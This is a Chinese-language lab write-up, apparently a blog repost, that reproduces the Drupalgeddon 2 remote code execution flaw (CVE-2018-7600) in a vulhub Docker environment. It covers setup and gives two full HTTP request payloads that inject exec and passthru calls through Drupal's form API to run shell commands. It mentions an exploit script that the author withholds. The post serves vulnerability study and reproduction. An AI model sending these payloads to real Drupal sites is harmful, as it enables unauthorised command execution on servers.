一、环境搭建:
进入镜像目录:
cd vulhub/drupal/CVE-2018-7600
启动环境:
docker-compose up -d
访问:yourip:8080即可进入到安装界面:
1、选择语言,建议选择English,不然要下载语言包:
2、默认点击继续按钮,在这选择Sqlite数据库:
3、随便填就可以了:
等待一段时间就可以看到安装成功的界面:
二、漏洞简介:
Drupal 是一款用量庞大的CMS,其6/7/8版本的Form API中存在一处远程代码执行漏洞。相关详细分析链接:https://research.checkpoint.com/uncovering-drupalgeddon-2/
影响版本:Drupal 6.x、Drupal 7.x、Drupal 8.x
三、漏洞复现:
构造如下post数据包,即可执行命令:
poc1:
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 192.168.136.141:8088
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id
poc2:
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 192.168.136.141:8088
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.18.7:8088/user/register
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=--------510529176
Content-Length: 372
Connection: close
----------510529176
Content-Disposition: form-data; name="mail[#post_render][]"
passthru
----------510529176
Content-Disposition: form-data; name="mail[#type]"
markup
----------510529176
Content-Disposition: form-data; name="mail[#markup]"
id
----------510529176
Content-Disposition: form-data; name="form_id"
user_register_form
----------510529176--
四、自写EXP:
支持以上两种poc:
python3 CVE-2018-7600_EXP.py http://192.168.136.141:8080 -p 1
poc1:
poc2:
python3 CVE-2018-7600_EXP.py http://192.168.136.141:8080 -p 2
脚本就不直接放出来了,因为各种原因吧,确实是有点心累..,需要的可以私聊我,可通过公众号首页加我...抱歉了
点个赞和在看吧,欢迎转发!
点个赞和在看吧,欢迎转发!
点个赞和在看吧,欢迎转发!
本文始发于微信公众号(哈拉少安全小队):[exp脚本] CVE-2018-7600 Drupal Drupalgeddon 2 RCE 漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论